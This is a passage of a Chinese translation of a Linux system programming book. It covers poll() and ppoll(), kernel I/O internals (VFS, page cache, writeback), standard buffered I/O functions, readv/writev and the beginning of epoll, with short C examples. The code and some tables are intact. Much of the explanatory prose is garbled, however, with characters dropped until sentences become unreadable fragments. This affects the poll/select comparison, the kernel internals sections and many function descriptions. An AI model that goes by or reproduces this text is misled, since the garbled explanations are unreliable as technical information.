成功时,poll() 返回 revents 字段非零的文件描述符个数;超时之前没有任何事件发生则返回 0。出错时返回 -1,并把 errno 设置为以下值之一:
EBADF   一个或多个结构体中存在非法的文件描述符。
EFAULT  fds 指针超出了进程的地址空间。
EINTR   等待事件时捕获了一个信号,可以重新发起调用。
EINVAL  nfds 参数超过了 RLIMIT_NOFILE 限制。
ENOMEM  没有足够的内存来完成请求。
2.10.3.2 poll() 的例子
我们 poll() 的程同时 stdin 读 stdout
写:
#include <stdio.h>
#include <unistd.h>
#include <sys/poll.h>
#define TIMEOUT 5 /* poll timeout, in seconds */
int main (void)
{
struct pollfd fds[2];
int ret;
/* watch stdin for input */
fds[0].fd = STDIN_FILENO;
fds[0].events = POLLIN;
/* watch stdout for ability to write (almost
always true) */
fds[1].fd = STDOUT_FILENO;
fds[1].events = POLLOUT;
/* All set, block! */
ret = poll (fds, 2, TIMEOUT * 1000);
if (ret == -1) {
perror ("poll");
return 1;
}
if (!ret) {
printf ("%d seconds elapsed.\n", TIMEOUT);
return 0;
}
if (fds[0].revents & POLLIN)
        printf ("stdin is readable\n");

if (fds[1].revents & POLLOUT)
        printf ("stdout is writable\n");
return 0;
}
我们的
$ ./poll
stdout is writable
将文件我们件
$ ./poll < ode_to_my_parrot.txt
stdin is readable
stdout is writable
设我们 poll()我们调时新
pollfd 。相同的能时内 revents 段
空。
2.10.3.3 ppoll()
Linux 提 poll() 的调 ppoll()。 ppoll( pselect() 同
然 pselect() 同的 ppoll() Linux 的调
#define _GNU_SOURCE
#include <sys/poll.h>
int ppoll (struct pollfd *fds,
nfds_t nfds,
const struct timespec *timeout,
const sigset_t *sigmask);
与 pselect() 一样,timeout 参数以秒和纳秒的组合指定超时时间,sigmask 则提供了解决信号处理与等待事件之间竞争条件的方案。
2.10.4 poll() 与 select()
们的工作 poll() 调然 select()
• poll() 的文件。
• poll() 对的文件时更效率。 select()
900 的文件内集的
。
• select() 的文件集小的以作出集
小 select() 以的文件的效率
。能集的时对的操作效率
。∗ poll() 以小的。或
。
• select()文件集时新的
调新们。 poll() 调离(events 段
出(revents 段即。
• select() 的 timeout 时的。的新
。然 pselect() 。
select() 调的的方
• poll() Unix poll()以 select() 的性更。
• select() 提更的超时方。 ppoll() pselect() 理
上提的实何调以的提
的。
poll() select() 更的 epoll Linux 的 I/O
方我们将。
2.11 内核内幕
Linux 内何实 I/O 的集的内子
文件(VFS页存页写。子 Linux 的 I/O
∗的的以零操作时
对进。然工作的。
更效。
我们将子 I/O 调。
2.11.1 虚拟文件系统
文件 (时 virtual file switch) Linux 内
的文件操作的。内文件
的文件操作文件。
VFS 实的方文件 (common file model)
Linux 文件的。对方∗文件
提 Linux 内文件的。 VFS 对文件
。提子读同步以及能。文
件的处理相操作。
方文件间的性。子 VFS 工作
inode superblock 上。 Unix 的文件能 Unix 的
inodes处理。实 Linux 以的
FAT NTFS 的文件。
VFS 的处。单的调以上的文件
上读单的工以文件上。文件
同的同的同的调。工作工
作。
read() 调段的程。 C 提
调的调的。空间
进程内调处理处理给 read() 调内
文件对的对。然内调相对的 read()
。对文件文件的。然
工作文件读给空间的
read() 调调空间的调处理然将
空间 read() 调进程。
对程 VFS 的的。程文件的
文件或。调 read() write()以及能
的文件上操作文件。
∗的 C 。
2.11.2 页缓存
页存内存存文件上的的方
式。相对的处理。内存存
内对相同的以内存读
。
页存性(locality of reference的方时间
性 (temporal locality)方能。
时的内存时存的
页存内文件的的。存时内
调存子读。读读
页存存给。读
存。页存的操作的的相
效的。
Linux 页存小的。 I/O 操作将的内存页
存空的内存。页存实的空
内存新的存出页存的
页将空间给真的内存。处理自进的。
的存 Linux 的内存存能的。
的页存的
能将读的更(内上存
的 RAM 更的内存空间。 Linux 内实
理页存(以及存的式方。式方能
理页存的时。
存间的以 /proc/sys/vm/swappiness 调。文件
以 0 100 间 60。的示内存页存
的示更理页存进。
性(locality of reference的式空间性 (sequential
locality)的的性。原理内实页存
读。读读时读更的页存的
作读效。内读时读
。读的时以
效。内以进程操作读时读。
的进程对的提新的读内以
I/O 将读。
页存内理读的。进程
读的内读读进更的。读
小 16KB 128KB。内读何的
文件的读以
读。
页存的存对程的。程
以页存更处 (空间实
存。的效率的以页存。方
读。然文件 I/O 。
2.11.3 页回写
write() 的的内写操
作。进程写进将
” ” 的内存的上的新。时写以
。对同新的写更新新。文件
的写新的。
” ” 写将文件内存同步。
的写。以件写
• 空内存小设的时的写上理
的能内存空间。
• 的超设的时写。以
的性。
写 pdflush 的内程操作(能 page dirty flush
。以上出时 pdflush 程
将的提件满。
能同时 pdflush 程写。更的性
。设备进写操作时的写
操作。自设备存 pdflush 程
设备。以内的处的 pdflush
程(bdflush单程能的时间设备
同时设备处空。上 Linux 内以
。
内 buffer head 示。
的的的。同时
实的。存页存。的方式将
子页存。
Linux 内 2.4 子页存离
的同时页存存。以同时
存(作的页存(存存。自然的同步
存时间。 2.4 Linux 内的的页存
的进。
Linux 的写子以写操作
时出的。性以同步
I/O(。
2.12 结论
Linux 程的文件 I/O。 Linux
文件的操作何读写文件的。
操作的 Unix 方式及。
集处理 I/O以及 C 的 I/O 。 C
出方空间的 I/O 提的性能提。
第 3 章
缓冲输入输出
我们的的文件的 I/O
的 - 的操作进的。以小
对时 I/O 效率理的。
操作效率调的。读读
1024 读 1024 相然效率更。 bolck 的
即以的进的操作效率理
的。的小 1K, 以 1130 的操作 1024 的
。
3.1 用户-缓冲 I/O
对文件 I/O 的程 I/O。
I/O 空间内的以程设
以调。的出性能方的内
写操作相 I/O 读操作。同的方
的提操作效率。
以空间程 dd
dd bs=1 count=2097152 if=/dev/zero of=pirate
bs=1, 进 2 097 152 操作 () 文件
/dev/zero(提的 0 文件的设备) 2M 文件 pirate 。
文件的程 2 的读写操作。
相同的 2M 1024 的:
dd bs=1024 count=2048 if=/dev/zero of=pirate
操作相同的 2M 内相同的文件 1024 读
写操作。 3 1 的效率提的。
小上的 dd 的时间(同的
。实时间的时时间时间空间程
的时间时间进程内调的时间。
3-1. 小对性能的
Block size
Real time
User time
System time
1 byte
18.707 seconds
1.118 seconds
17.549 seconds
1,024 bytes
0.025 seconds
0.002 seconds
0.023 seconds
1,130 bytes
0.035 seconds
0.002 seconds
0.027 second
1024 小进操作 1 相的性能提
。示更的小(的调
小小的效率。即
更的调 1130 的对的操作 1024 的
效率更。
性能的理小。式的
小能 1024 1024 的或 1024 的。
/dev/zero 的小实上 4096B。
3.1.1 块大小
实小 512 1024 2048 或 4096
。 3 1 示效率的提将操作的设
小或的。内件间的。
以小或能能的对
的以的内操作。
调 stat()(我们将) 或 stat(1) 以设备的
小。实上我们的小.
I/O 操作小的 1130
的。 Unix 的上 1130 的的小
操作 I/O 对。小的或以对的
。的小操作对, 效率。的
调。
然, 单的方小小的
I/O。 4096 或 8192 的效.
程以单进操作. 程以, , 单
单进操作的。, , 程
I/O. 写时, 存程空间的。
给的(小时操作写
出。同理读操作读小对的。程对
的读时的给出。空时
的对的读。的小设将的效率
提。
以程实。实上实
的。然程 I/O (C 的)以提
能的方。
3.1.2 标准 I/O
C 提 I/O (单作 stdio)实
的方。 I/O 单能。程
( FORTAN) 同, C
对能提内然对 I/O 的内。 C
的展们提能的处理、
、时间以及 I/O 。程 ANSI C 的
(C89) C 。然 C95 C99
新的 I/O 1989 的时相。
的 I/O。属文件出 C
实、、读写文件 C 。程
I/O 或自的调
设程的能。
C 给实的相实
扩展的性。的 Linux 上的
glibc 实的。 Linux 离的时我
们以。
3.1.3 文件指针
I/O 程操作文件。的们自的
即的文件 (file pointer)。 C 文件映射
文件。文件 FILE 的示 FILE <stdio.h>
。
I/O , 的文件” ”(stream)。以读 (
), 写 (出), 或 (出)。
3.2 打开文件
文件 fopen() 以读写操作:
#include <stdio.h>
FILE* fopen(const char * path, const char * mode);
的式文件 path, 新的。
3.2.1 模式
式 mode 以的方式文件。以
:
r   打开文件用于读取。流定位在文件的起始处。
r+  打开文件用于读写。流定位在文件的起始处。
w   打开文件用于写入。如果文件已存在,则把文件清空;如果不存在,则创建它。流定位在文件的起始处。
w+  打开文件用于读写。如果文件已存在,则把文件清空;如果不存在,则创建它。流定位在文件的起始处。
a   以追加模式打开文件用于写入。如果文件不存在则创建它。流定位在文件的末尾,所有写入都追加到文件尾部。
a+  以追加模式打开文件用于读写。如果文件不存在则创建它。流定位在文件的末尾,所有写入都追加到文件尾部。
给的式能 b, Linux 。操作
同的方式对文进文件, b 式示文件进。
Linux, 的性的操作, 以相同的方式对文进文
件。
时,fopen() 的 FILE 。时, NULL, 相
的设 errno。
, 的 /etc/manifest 以读, 将:
FILE *stream;
stream = fopen ("/etc/manifest", "r");
if (!stream)
/* error */
3.2.2 通过文件描述符打开文件
fdopen() 将的文件 (fd) :
#include <stdio.h>
FILE * fdopen (int fd, const char *mode);
fdopen() 的能式 fopen() , 原文件的式
。以式 w w+, 们文件。的设文件
的文件。文件, 文
件上进 I/O(的。的文件
, 新的。相的文件。
时,fdoepn() 的文件; 时, NULL。, 的
open() 调 /home/kidd/map.txt, 然的文件
的:
FILE *stream;
int fd;

fd = open ("/home/kidd/map.txt", O_RDONLY);
if (fd == -1)
        /* error */

stream = fdopen (fd, "r");
if (!stream)
        /* error */
3.3 关闭流
fclose() 给的
#include <stdio.h>
int fclose (FILE *stream);
写出的写出。时 fclose()
0。时 EOF 相的设 errno。
3.3.1 关闭所有的流
fcloseall() 的进程相的
出
#define _GNU_SOURCE
#include <stdio.h>
int fcloseall (void);
的的写出。 0 Linux
的。
3.4 从流中读取数据
C 实读的方。
的单的读单的读进读。读
以的方式何 w 或 a 的式以。
3.4.1 单字节读取
理的出式单读。 fgetc() 以
读单
#include <stdio.h>
int fgetc (FILE *stream);
读 int 。
的示文件: EOF 。
fgetc() 的以 int 存。存 char
的。的子读单然以方式
int c;
c = fgetc (stream);
if (c == EOF)
/* error */
else
printf ("c=%c\n", (char) c);
stream 的以读式。
3.4.2 把字符回放入流中
出提将的。
的以。
#include <stdio.h>
int ungetc (int c, FILE *stream);
调 c 。时 c; 时
EOF。读 c。们以的
方式的。 POSIX 出间读时
能。然实。的内存
Linux 的。然。
调 ungetc() 读
(’ ’) 的调的。
进程的程实的的程。
3.4.3 按行的读取
fgets() 给的读:
#include <stdio.h>
char * fgets (char *str, int size, FILE *stream);
读 size 1 的存 str 。
读时空存。读 EOF 或时读。
读’\n’ 存 str。
时 str时 NULL。
char buf[LINE_MAX];
if (!fgets (buf, LINE_MAX, stream))
/* error */
POSIX <limits.h> LINE MAX POSIX 能
处理的的。 linux 的 C 提的 (以
), 能 LINE MAX 。程以 LINE MAX
linux 设的相对。对 linux 的程
小的。
3.4.4 读取任意字符串
fgets() 的读的。时。时
。时
。的
存的。
fgetc() 写 fgets() 。的段读 n-1
str 然上’\0’
char *s;
int c;
s = str;
while (--n > 0 && (c = fgetc (stream)) != EOF)
*s++ = c;
*s = '\0';
段程以扩展的 d 处 ( d 能空
)
char *s;
int c = 0;
s = str;
while (--n > 0 && (c = fgetc (stream)) != EOF &&
(*s++ = c) != d)
;
if (c == d)
        *--s = '\0';
else
        *s = '\0';
在这里,把分隔符 d 设为 '\n',就能提供与 fgets() 类似的功能。
fgets() 的实实方式能调
fgetc()。然我们的 dd 子同。然段出的
调进的调 dd 程 bs 1 的对 I/O
, 相对更的。
3.4.5 读取二进制文件
程读。时读写的进
C 的。出提 fread():
#include <stdio.h>
size_t fread (void *buf, size_t size, size_t nr,
FILE *stream);
调用 fread() 会从 stream 中读取 nr 个元素,每个元素 size 个字节,并把数据存入 buf 所指向的缓冲区。文件指针前移实际读取的字节数。返回值是读到的元素个数(注意,不是字节数!)。当读取失败或到达文件结尾时,返回比 nr 小的值。不幸的是,只有通过 ferror() 和 feof()(见后面"错误和文件结束"一节)才能区分这两种情况。
小对 的 同 程 写 的 进 文
件对程能读的即程上的
能读的。
fread() 单的子给读性小的
char buf[64];
size_t nr;
nr = fread (buf, sizeof(buf), 1, stream);
if (nr == 0)
/* error */
我们 fread() 相对的 fwrite() 时我们更的子。
3.5 向流中写数据
读相同 C 将写的。
我们的写的方单的写写
进写。同的写方对 I/O 的。写
以的出的式 r 的的式。
3.5.1 对齐的讨论
的设对的。程内存单
的。处理以小对内存进读写。相处理以
的 ( 2 4 8 或 16 ) 内存。处理的空间
0 进程的读。 C 的存
对的。的自对的的 C
小相的对。 32 以 4 对。
int 存能 4 的内存。对的同的
上同程的性能。处理能对的
性能。的处理能对的
件异。更的处理对
的的。自对对
程的。处理内存理存进
进时对。程
方。更的对的内。
3.5.2 写入单个字符
fgetc() 相对的 fputc():
#include <stdio.h>
int fputc (int c, FILE *stream);
fputc() 将 c 示的 () 写 stream 的
。时 c。 EOF相的设 errno。
单
if (fputc ('p', stream) == EOF)
/* error */
子将 p 写写。
3.5.3 写入字符串
fputs() 给的写的
#include <stdio.h>
int fputs (const char *str, FILE *stream);
fputs() 的调将 str 的的写 stream 的
。时 fputs() 。时 EOF。
的子以式文件写将给的写相的
然
stream = fopen ("journal.txt", "a");
if (!stream)
        /* error */

if (fputs ("The ship is made of wood.\n", stream) == EOF)
        /* error */

if (fclose (stream) == EOF)
        /* error */
3.5.4 写入二进制数据
程写进单能满。
存进 C I/O 提 fwrite() :
#include <stdio.h>
size_t fwrite (void *buf,
size_t size,
size_t nr,
FILE *stream);
调 fwrite() buf 的 nr 写 stream
size。文件写的的。
时写的 (的!)。小 nr 的
。
3.5.5 缓冲 I/O 示例程序
我们子实上的程
及的。程 pirate然
的。程的文件 dada 的
出将写。同的程 data 读存
pirate 的实。程的内出出:
#include <stdio.h>

int main (void)
{
        FILE *in, *out;
        struct pirate {
                char name[100];         /* real name */
                unsigned long booty;    /* in pounds sterling */
                unsigned int beard_len; /* in inches */
        } p, blackbeard = { "Edward Teach", 950, 48 };

        out = fopen ("data", "w");
        if (!out) {
                perror ("fopen");
                return 1;
        }

        if (!fwrite (&blackbeard, sizeof (struct pirate), 1, out)) {
                perror ("fwrite");
                return 1;
        }

        if (fclose (out)) {
                perror ("fclose");
                return 1;
        }

        in = fopen ("data", "r");
        if (!in) {
                perror ("fopen");
                return 1;
        }

        if (!fread (&p, sizeof (struct pirate), 1, in)) {
                perror ("fread");
                return 1;
        }

        if (fclose (in)) {
                perror ("fclose");
                return 1;
        }

        printf ("name=\"%s\" booty=%lu beard_len=%u\n",
                p.name, p.booty, p.beard_len);

        return 0;
}
出然原的:
name="Edward Teach" booty=950 beard_len=48
我们的、对的同程写的
进对程能读的。同的程即
同上的同程能能读 fwrite() 写的。我们的
子以的小或的
将。东能 ABI 的上能相
同。
3.6 定位流
的的。能程读的
的文件。的时能将设文件的
。 I/O 提能调 lseek() 的
()。 fseek() I/O 的操文件
offset whence 的:
#include <stdio.h>
int fseek (FILE *stream, long offset, int whence);
whence 设 SEEK SET, 文 件 的 设 offset 处。
whence 设 SEEK CUR, 文件设上 offset. whence
设 SEEK END, 文件设文件上 offset。
成功时,fseek() 返回 0,错误标志和文件结束标志被清除,之前 ungetc() 操作的效果被撤销。出错时返回 -1,并相应设置 errno。最常见的错误是非法的流(EBADF)和非法的 whence 参数(EINVAL)。
标准 I/O 还提供了 fsetpos() 函数:
#include <stdio.h>
int fsetpos (FILE *stream, fpos_t *pos);
将的设 pos 处。将 whence 设 SEEK SET 时
的 fseek() 能。时 0。 -1, 相设 errno 的
。 (将的对的 fgetpos() ) ( UNIX) 能
示的的上提。上能
将设的方的能。 linux 的程
们能的上。
I/O 提 rewind() 段
#include <stdio.h>
void rewind (FILE *stream);
调
rewind(stream);
将的。:
fseek (stream, 0, SEEK_SET);
空。 rewind() 能提
。调调空 errno
调零。
errno = 0;
rewind (stream);
if (errno)
/* error */
3.6.1 获得当前流位置
lseek() 同 fseek() 更新的。单的提
能。 ftell() 的:
#include <stdio.h>
long ftell (FILE *stream);
时 -1相的设 errno。性的出提
fgetpos()
#include <stdio.h>
int fgetpos (FILE *stream, fpos_t *pos);
时 fgetpos() 0将的设 pos。时
-1, 相的设 errno。 fsetpos() fgetpos() 文件
的 linux 上提。
3.7 清洗一个流
I/O 提将写内的
write() 写出的。 fflush() 提能
#include <stdio.h>
int fflush (FILE *stream);
调时 stream 的的写的 (flush)
内。 stream 空的(NULL 进程的。时
fflush() 0。时 EOF相的设 errno。
理 fflush() 的作理 C 的内
自的的。提的调的 C
的们空间内空间。效率提的原
程空间的调。
或时调。 fflush() 的
写内。效 write() 调
的。能写理的 fsync(
(同时 I/O)。更的调 fflush() , 即调 fsync():
写内然内写。
3.8 错误和文件结束
I/O fread(), 调的能
们提 EOF 的。调时
给的出文件。 I/O 提。
ferror() 上设
#include <stdio.h>
int ferror (FILE *stream);
的 I/O 设。设
零 0。 feof() 文件设
#include <stdio.h>
int feof (FILE *stream);
文件的时 EOF I/O 设。
设零 0。 clearerr() 空文件
#include <stdio.h>
void clearerr (FILE *stream);
(方提的
)。 error EOF 以调 clearerr()操作
的。
/* ’f’ is a valid stream */
if (ferror (f))
printf (”Error on f!\n”);
if (feof (f))
printf (”EOF on f!\n”);
clearerr (f);
3.9 获得关联的文件描述符
时文件方的。的 I/O
存时以的文件对调。
的文件以 fileno():
#include <stdio.h>
int fileno (FILE *stream);
时 fileno() 相的文件。时 1。
给 的 时 能 时 将 errno 设
EBADF。出调调。 fileno() 时程
操作谨。的文件
对进 (flush)。 I/O 操作。
3.10 控制缓冲
I/O 实提
小的。同的提同能同的。
。提内。对
。的。
以单。提内。对出
的。的方式 (出)。
以单。的文
件。的文件相的的。 I/O 。
的效的。然 I/O 实提
的的
#include <stdio.h>
int setvbuf (FILE *stream, char *buf, int mode,
size_t size);
setbuf() 设的式式以的
_IONBF  无缓冲
_IOLBF  行缓冲
_IOFBF  块缓冲
除了 _IONBF(此时 buf 和 size 被忽略)之外,buf 可以指向一块 size 字节大小的缓冲空间,标准 I/O 会把它用作给定流的缓冲区。如果 buf 为空,glibc 会自动分配指定大小的缓冲区。
setvbuf(何操作调。时
0出零。
时的存。的
作的自作。的
main() 内的式。以
#include <stdio.h>
int main (void)
{
char buf[BUFSIZ];
/* set stdout to block-buffered with a BUFSIZ buffer */
setvbuf (stdout, buf, _IOFBF, BUFSIZ);
printf ("Arrr!\n");
return 0;
}
以离作式或将作
。
的操上的。
的。文件的以。的
小 <stdio.h> 的 BUFSIZ的 (
小的)。
3.11 线程安全
程同进程的实。程的同空
间的进程。同步或将程程以何
时间。程的操作提(相的程
程相。 I/O 。
能满。时给调将(段
的的 I/O 操作扩。能
提效率。我们。
I/O 的上程的。内实设
的的程。程何 I/O
程。或同上的程
能 I/O 操作单调的上文 I/O 操
作原子的。
然实程单的调更的原子
性。程写程能读写
间。的 I/O 操的提
的。
/** 的。程能式将的
I/O 操作程。的。
* /
3.11.1 手动文件加锁
flockfile() 然的
程然:
#include <stdio.h>
void flockfile (FILE *stream);
funlockfile() 相的
#include <stdio.h>
void funlockfile (FILE *stream);
0的程的程能
。调以。程以 flockfile() 调
程相同的 funlockfile() 调。 ftrylockfile()
flockfile() 的:
#include <stdio.h>
int ftrylockfile (FILE *stream);
ftrylockfile() 何处理即零
。的程
0。我们子
flockfile (stream);

fputs ("List of treasure:\n", stream);
fputs ("  (1) 500 gold coins\n", stream);
fputs ("  (2) Wonderfully ornate dishware\n", stream);

funlockfile (stream);
单的 fputs() 操作我们内
”List oftreasure” 的出程能程的 fputs()
间。理程的程同提 I/O 操
作。然的程单调更的
原子操作 flockfile() 的相以。
3.11.2 不加锁流操作
给原。能提更更
的以将的小提效率。 Linux 提
的的 I/O 何操作。们实
上的 I/O
#define _GNU_SOURCE
#include <stdio.h>
int fgetc_unlocked (FILE *stream);
char *fgets_unlocked (char *str, int size, FILE
*stream);
size_t fread_unlocked (void *buf, size_t size,
size_t nr,FILE *stream);
int fputc_unlocked (int c, FILE *stream);
int fputs_unlocked (const char *str, FILE
*stream);
size_t fwrite_unlocked (void *buf, size_t size,
size_t nr,FILE *stream);
int fflush_unlocked (FILE *stream);
int feof_unlocked (FILE *stream);
int ferror_unlocked (FILE *stream);
int fileno_unlocked (FILE *stream);
void clearerr_unlocked (FILE *stream);
们或上的相对的
相同操作。程工。
POSIX 的 I/O 上的 POSIX
的。们 Linux 的的 Unix 的以上提的
。
3.12 对标准 I/O 的批评
I/O 出的。
fgets(), 时能满。 gets(
出。
对 I/O 的的性能。读时 I/O 对内
read() 调内 I/O 。然程
I/O 读时 fgetc(
I/O 的的。写时相的方式给
的空间 I/O 然 I/O write() 写
内。
的读 I/O 的
。以 I/O 读的
。程实自的时能写以
。实提” ” 的程们
的读时出。
写操作更然能。写
时实备将内时写出
。以散 - 聚集 I/O(scatter-gather I/O) 的 writev() 实
能调。 (我们散布 - 聚集 I/O)。
的们我们的方
。实们自的方。
同的 I/O 然。
3.13 结论
I/O C 提的。的方
的方。 C 程实上 I/O对
的。然对 I/O理的 I/O
的的方。调 write(出写
I/O(
. 能调调
。
. 性能的的 I/O 以小进能
对。
. 的式或的实
进的调。
. 相的 Linux 调更喜的。
然的能的 Linux 调。我们将
式的 I/O 相的调。
第 4 章
高级文件 I/O
我们 Linux 的 I/O 调。调文件
I/O 的 Linux 方式的。我们
I/O 调上空间空间的
方即 C 的 I/O 。我们将 Linux 提的更 I/O
调
散布 / 聚集 I/O I/O 单调同时对读或写操
作聚集同进的 I/O 操作。
epoll
poll() select() 的进程处理文件
的时。
内存映射 I/O
将文件映射内存以单的内存理方式处理文件;
的 I/O。
文件 I/O 提示
进程将文件 I/O 上的提示提给内; 能提
I/O 性能。
异步 I/O
进程出 I/O ;
程的处理 I/O 操作。
将性能内的 I/O 子。
4.1 散布 / 聚集 I/O
散布聚集 I/O 以单调操作的 I/O 方
以将单的内写或单读
。散布或聚
集。方的 I/O。相对的提的读写调
以作性 I/O。
散布 / 聚集 I/O 性 I/O 相:
更自然的处理方式 的段的(处理的文件段
I/O 提的处理方式。
效率
单 I/O 操作能性 I/O 操作。
性能
调的内 I/O 性
I/O 提更的性能。
原子性
同性 I/O 操作进程以单 I/O
操作进程操作的。
我们以散布 / 聚集 I/O 更自然的 I/O 方操作
原子性。进程以写散的写以读
的散即工实空间的散布
聚集。处理效的。
4.1.1 readv() 和 writev()
Linux 实 POSIX 1003.1-2001 的散布 / 聚集的调
。 Linux 实上的性。
readv() fd 读 count segment iov 的∗
#include <sys/uio.h>
ssize_t readv (int fd, const struct iovec *iov,
int count);
writev() iov 的读 count segment 的写 fd
#include <sys/uio.h>
ssize_t writev (int fd, const struct iovec *iov,
int count);
操作 readv() writev() 的 read() write() 。
iovec 的我们段 (segment)
#include <sys/uio.h>
struct iovec {
void *iov_base;
size_t iov_len;
};
∗处的 segment iov
segment 的集 (vector)。段读写的的
。 readv() 处理满的 iov len
。 writev() 处理 iov len
出。 iov[0] iov[1] iov[count-1] 处理段。
4.1.1.1 返回值
操作时 readv() writev() 读写的。
iov len 的。出时 -1设 errno。调能
何 read() write() 能的相同时 errno 设同的
。的。
ssize t iov len 的 SSIZE MAX
处理 -1 errno 设 EINVAL。
POSIX count 0小 IOV MAX(
<limits.h> 。 Linux IOV MAX 1024。 count 0
调 0。† count IOV MAX处理 -1 errno 设
EINVAL。
count
I/O 操 作 内 内 示 段 (seg-
ment)。 count 的小进的。出的的
count 小的内上段内存
性能上的提。 8以 count 小 8 时
I/O 操作以效的内存方式。
I/O 段。
小的时 8 或更小的性能的提。
4.1.1.2 writev() 示例
我们单的子 3 段段同的
的写。程以示 writev() 的能同时以
作段的段
†的 Unix count 0 时能将 errno 设 EINVAL。
的 count 0以设 EINVAL 或处理。
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <string.h>
#include <sys/uio.h>
int main ()
{
struct iovec iov[3];
ssize_t nr;
int fd, i;
char *buf[] = {
        "The term buccaneer comes from the word boucan.\n",
        "A boucan is a wooden frame used for cooking meat.\n",
        "Buccaneer is the West Indies name for a pirate.\n" };
fd = open ("buccaneer.txt", O_WRONLY | O_CREAT | O_TRUNC, 0644);
if (fd == -1) {
        perror ("open");
        return 1;
}
/* fill out three iovec structures */
for (i = 0; i < 3; i++) {
iov[i].iov_base = buf[i];
iov[i].iov_len = strlen (buf[i]) + 1;
}
/* with a single call, write them all out */
nr = writev (fd, iov, 3);
if (nr == -1) {
        perror ("writev");
        return 1;
}
printf ("wrote %ld bytes\n", (long) nr);

if (close (fd)) {
        perror ("close");
        return 1;
}
return 0;
}
程:
$ ./writev
wrote 148 bytes
读文件内:
$ cat buccaneer.txt
The term buccaneer comes from the word boucan.
A boucan is a wooden frame used for cooking meat.
Buccaneer is the West Indies name for a pirate.
4.1.1.3 readv() 示例
我们 readv() 的文文件读。程同
单:
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/uio.h>
int main ()
{
char foo[48], bar[51], baz[49];
struct iovec iov[3];
ssize_t nr;
int fd, i;
fd = open ("buccaneer.txt", O_RDONLY);
if (fd == -1) {
        perror ("open");
        return 1;
}
/* set up our iovec structures */
iov[0].iov_base = foo;
iov[0].iov_len = sizeof (foo);
iov[1].iov_base = bar;
iov[1].iov_len = sizeof (bar);
iov[2].iov_base = baz;
iov[2].iov_len = sizeof (baz);
/* read into the structures with a single call
*/
nr = readv (fd, iov, 3);
if (nr == -1) {
        perror ("readv");
        return 1;
}
for (i = 0; i < 3; i++)
        printf ("%d: %s", i, (char *) iov[i].iov_base);

if (close (fd)) {
        perror ("close");
return 1;
}
return 0;
}
上程程出
$ ./readv
0: The term buccaneer comes from the word boucan.
1: A boucan is a wooden frame used for cooking meat.
2: Buccaneer is the West Indies name for a pirate.
4.1.1.4 实现
我们以空间实单的 readv() writev()的
#include <unistd.h>
#include <sys/uio.h>
ssize_t naive_writev (int fd, const struct iovec
*iov, int count)
{
ssize_t ret = 0;
int i;
for (i = 0; i < count; i++) {
ssize_t nr;
nr = write (fd, iov[i].iov_base,
iov[i].iov_len);
if (nr == -1) {
ret = -1;
break;
}
ret += nr;
}
return ret;
}
的 Linux 的实 Linux readv() writev() 作调
实内散布 / 聚集 I/O。实上内的 I/O I/O
read() write() 的 I/O段。
4.2 Event Poll 接口
poll() select() 的 2.6 内∗ event poll(epoll) 。然
实 epoll 们的性能
新的性。
poll() select()() 调时的文件。内
的文件。时 — 上
上文件时 — 调时的的。
epoll 实离出。
调 epoll 上文上文或的文件
真的件 (event wait)。
4.2.1 创建一个新的 epoll 实例
epoll create() epoll 上文
#include <sys/epoll.h>
int epoll_create (int size)
调 epoll create() epoll 实实的文件
。文件真的文件调
epoll 的。 size 内的文件
。的性能的提给出的。出
时 -1设 errno
EINVAL
size 。
ENFILE
文件的上。
ENOMEN 的内存操作。
的调
int epfd;
epfd = epoll_create (100); /* plan to watch ~100 fds */
if (epfd < 0)
perror ("epoll_create");
∗epoll 最早出现在 2.5.44 开发版内核中,接口最终在 2.5.66 版中定型。
epoll create() 的文件调 close() 。
4.2.2 控制 epoll
epoll ctl() 以的 epoll 上文或文件
#include <sys/epoll.h>
int epoll_ctl (int epfd, int op, int fd, struct
epoll_event *event);
文件 <sys/epoll.h> epoll event
struct epoll_event {
__u32 events; /* events */
union {
void *ptr;
int fd;
__u32 u32;
__u64 u64;
} data;
};
epoll ctl() 调将 epoll 实 epfd。 op 对 fd 进的操
作。 event epoll 更的。
以 op 的效:
EPOLL_CTL_ADD  把 fd 指向的文件描述符添加到 epfd 指向的 epoll 实例的监听集合中,监听 event 中定义的事件。
EPOLL_CTL_DEL  把 fd 指向的文件描述符从 epfd 指向的 epoll 监听集合中删除。
EPOLL_CTL_MOD  使用 event 修改已有 fd 上的监听事件。
epoll_event 结构体中的 events 字段列出了在给定文件描述符上要监听的事件。多个事件可以用位或运算同时指定。以下为合法的 events 值:
EPOLLERR      文件描述符出错。即使不设置,这个事件也会被监听。
EPOLLET       在监听文件描述符上开启边沿触发(见后面"边沿触发事件和水平触发事件"一节)。默认是水平触发。
EPOLLHUP      文件描述符被挂断。即使不设置,这个事件也会被监听。
EPOLLIN       文件描述符可以不阻塞地读取。
EPOLLONESHOT  事件产生并被处理一次之后,该文件描述符不再被监听。必须通过 EPOLL_CTL_MOD 指定新的事件掩码,才能重新监听该文件描述符。
EPOLLOUT      文件描述符可以不阻塞地写入。
EPOLLPRI      有高优先级的带外数据可读。
epoll_event 中的 data 字段由用户私用。被监听的事件发生后,data 会原样返回给用户。通常把 event.data.fd 设为 fd,这样就能很快知道是哪个文件描述符触发了事件。
epoll_ctl() 成功时返回 0。失败时返回 -1,并把 errno 设置为以下值:
EBADF   epfd 不是一个合法的 epoll 实例,或 fd 不是一个合法的文件描述符。
EEXIST  op 为 EPOLL_CTL_ADD,但 fd 已经与 epfd 关联。
EINVAL  epfd 不是 epoll 实例,epfd 与 fd 相同,或 op 非法。
ENOENT  op 为 EPOLL_CTL_MOD 或 EPOLL_CTL_DEL,但 fd 没有与 epfd 关联。
ENOMEM  没有足够的内存来处理请求。
EPERM   fd 不支持 epoll。
epfd 实 fd 的文件以
struct epoll_event event;
int ret;

event.data.fd = fd; /* return the fd to us later */
event.events = EPOLLIN | EPOLLOUT;
ret = epoll_ctl (epfd, EPOLL_CTL_ADD, fd, &event);
if (ret)
        perror ("epoll_ctl");
epfd 实的 fd 上的件以
struct epoll_event event;
int ret;

event.data.fd = fd; /* return the fd to us later */
event.events = EPOLLIN;
ret = epoll_ctl (epfd, EPOLL_CTL_MOD, fd, &event);
if (ret)
        perror ("epoll_ctl");
相的 epfd fd 上的件以
struct epoll_event event;
int ret;

event.data.fd = fd; /* return the fd to us later */
event.events = EPOLLIN;
ret = epoll_ctl (epfd, EPOLL_CTL_DEL, fd, &event);
if (ret)
        perror ("epoll_ctl");
